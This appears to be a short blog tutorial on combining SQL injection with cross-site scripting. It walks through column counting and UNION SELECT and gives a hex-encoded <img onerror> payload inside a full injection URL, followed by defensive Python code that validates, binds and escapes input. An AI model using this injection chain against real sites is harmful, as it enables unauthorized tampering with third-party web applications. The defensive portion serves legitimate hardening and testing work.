Today I am going to show you how a website can be attacked using XSS (cross-site scripting) combined with SQLi.
This is pretty simple! We just have to inject our JavaScript code into the website. I will not teach you the basics of SQLi.
Let’s start:
Step 1:
First we have to find a site that is vulnerable to SQLi.
Like this:
http://www.site.in/index.php?id=3
Step 2:
Find the number of columns on the site using the ORDER BY method.
~ Suppose our site has 9 columns!
Step 3:
Find the vulnerable column using the UNION ALL SELECT method.
~ And the vulnerable column is 3!
Step 4:
Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection payload:-
<img src=x onerror=confirm(/XSS/)>
Our hex-encoded payload:-
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
Step 5:
Injecting The Payload Into The Site!
Like this:-
http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9--+
Note: “This is for educational purposes only. Discussing or reading about a thief's technique is not a crime, but implementing it is.”
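The defensive side of the steps above, as an added example that is not code from the original post: a handler that rejects the Step 5 parameter, binds the id instead of concatenating it, and HTML-encodes database values on output, plus a log-triage helper that decodes 0x literals. Python with sqlite3 stands in for the site's PHP/MySQL stack, and the articles table, its rows and all function names are constructed for illustration.

```python
# Added example: Python/sqlite3 stands in for the page's PHP/MySQL stack (assumption).
import html
import re
import sqlite3

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")

def decode_hex_literals(raw):
    """Log triage: decode MySQL-style 0x... literals found in a parameter."""
    return [bytes.fromhex(h).decode("utf-8", "replace") for h in HEX_LITERAL.findall(raw)]

def parse_id(raw):
    """Accept only a plain non-negative integer; anything else is rejected."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw) else None

def render_article(conn, raw_id):
    """Hardened handler: validate, bind the parameter, encode on output."""
    article_id = parse_id(raw_id)
    if article_id is None:
        return 400, "<p>Bad request</p>"
    row = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    if row is None:
        return 404, "<p>Not found</p>"
    title, body = (html.escape(str(v), quote=True) for v in row)
    return 200, f"<h1>{title}</h1><p>{body}</p>"

def make_db():
    """Constructed sample data; row 4 holds markup to exercise output encoding."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (3, "Hello", "Welcome to the site"),
        (4, "Stored", "<img src=x onerror=confirm(/XSS/)>"),
    ])
    return conn

# The id value from the Step 5 URL, after URL decoding ('+' becomes a space).
STEP5_ID = ("-3' union select 1,2,"
            "0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e"
            ",4,5,6,7,8,9-- ")

if __name__ == "__main__":
    db = make_db()
    print(render_article(db, "3"))        # normal request
    print(render_article(db, STEP5_ID))   # rejected before any SQL runs
    print(render_article(db, "4"))        # markup from the database is encoded
    print(decode_hex_literals(STEP5_ID))  # what the hex literal contained
```

Input validation and parameter binding stop the query from being rewritten; output encoding is the separate control that keeps any markup already in the database from executing in the browser.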





